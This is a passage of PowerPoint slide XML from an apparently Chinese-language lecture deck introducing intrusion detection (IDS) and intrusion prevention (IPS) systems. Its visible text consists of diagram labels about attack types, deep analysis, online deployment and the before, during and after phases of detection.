                <a:srgbClr val="EA157A">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>N</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="116" name="AutoShape 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528B1B98-EA69-8C20-25AF-F6984C782CD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4352925" y="3148625"/>
              <a:ext cx="533400" cy="346075"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecision">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7FD13B"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="7FD13B">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Y</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="117" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD3CC3A-FAC6-3F2A-8BF2-D669015F5D38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="115" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792538" y="2858111"/>
              <a:ext cx="646112" cy="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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="118" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62EFDD08-228C-80CC-980C-B14F3C925988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="116" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792538" y="3321661"/>
              <a:ext cx="646112" cy="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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="119" name="AutoShape 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF90D1AE-E42B-F1FB-22F8-C202E9BE32E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="63" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3719513" y="4370999"/>
              <a:ext cx="646112" cy="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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="120" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33CD9DEF-8181-23F5-2574-67BEFC811150}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="114" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3719513" y="4875824"/>
              <a:ext cx="646112" cy="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sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="AutoShape 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28ACE600-B207-6123-87DD-075BB5BC6CA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5481638" y="2621575"/>
              <a:ext cx="1530350" cy="2473325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7685"/>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ln>
            <a:effectLst>
              <a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="38000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>入侵威胁</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122" name="AutoShape 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C2F5FE5-21D8-48A5-A612-05184C852051}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5615917" y="2722080"/>
              <a:ext cx="1262951" cy="406400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA157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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" kern="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>无连接攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123" name="AutoShape 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4496023B-2AF5-C4DC-94F2-A552E8F5D7A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5615572" y="4583110"/>
              <a:ext cx="1263273" cy="406400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA157A">
                <a:lumMod val="75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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>深层攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="124" name="Text Box 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499B18E6-43DB-156E-4F2A-A171A183597B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868989" y="3164500"/>
              <a:ext cx="680671" cy="378113"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>……</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="125" name="AutoShape 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7352DFEE-F16D-CF2F-E2E0-336D6E3AC04A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4872039" y="2888274"/>
              <a:ext cx="644525" cy="635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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="126" name="AutoShape 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1534FD7D-116B-08EC-5B60-13078FBB520E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4872039" y="4855186"/>
              <a:ext cx="644525" cy="6350"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="38000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="AutoShape 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A882C1-6337-8329-1A44-317C24B70BFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7664450" y="3353412"/>
              <a:ext cx="1728788" cy="1008063"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7190"/>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128" name="AutoShape 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB4BB43-FCB2-1879-6C75-EB7847BC5209}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8329415" y="3928478"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="1AB39F">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="1AB39F">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="1AB39F">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a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>在线部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="AutoShape 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090EC337-7161-3486-B2D7-FB48CA06EC05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8328682" y="3453354"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="EA157A">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="EA157A">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EA157A">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spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>深层分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="Text Box 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F55013-1D0A-9342-B427-AD92E71F69D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7718425" y="3672499"/>
              <a:ext cx="470689" cy="302490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr b="1">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IPS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8547CA70-C4F6-0780-A356-346F5880151F}"/>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marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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深层防御－需要深层分析和在线部署</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E55BB94-27C3-4904-806D-75DBC15BD152}"/>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389381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348740" y="1540510"/>
            <a:ext cx="2438400" cy="2921635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="76200"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4251325" y="1539875"/>
            <a:ext cx="7089775" cy="654685"/>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入侵检测是一种网络入侵识别技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4375150" y="2230120"/>
            <a:ext cx="5911215" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="9309" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="792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rPr>
                <a:t>事前预防：识别网络入侵企图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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42"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10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4375150" y="2856230"/>
            <a:ext cx="6317615" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="9949" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="8566"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rPr>
                <a:t>事中反制：正在发生的网络入侵行为</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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2" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9174"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4399280" y="3486150"/>
            <a:ext cx="6772910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10666" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="9283"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rPr>
                <a:t>事后分析：网络入侵发生后搜集相关信息</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5" name="组合 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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7"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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203189" y="4902654"/>
            <a:ext cx="9785622" cy="108512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eaLnBrk="0" latinLnBrk="1" hangingPunct="0"/>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入侵检测系统</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IDS</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a:t>
            </a:r>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I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">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ntrusion Detection System</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）是防火墙之后的第一道网络安全闸门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6C67F0-E519-42AC-9224-0D08FF7CEB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、入侵检测系统概述</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8547CA70-C4F6-0780-A356-346F5880151F}"/>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a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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IPS</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与</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IDS:</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技术同源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE503AF-EFE7-685B-042E-2C213C30EAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7537451" y="1989139"/>
            <a:ext cx="2879725" cy="4319587"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0">
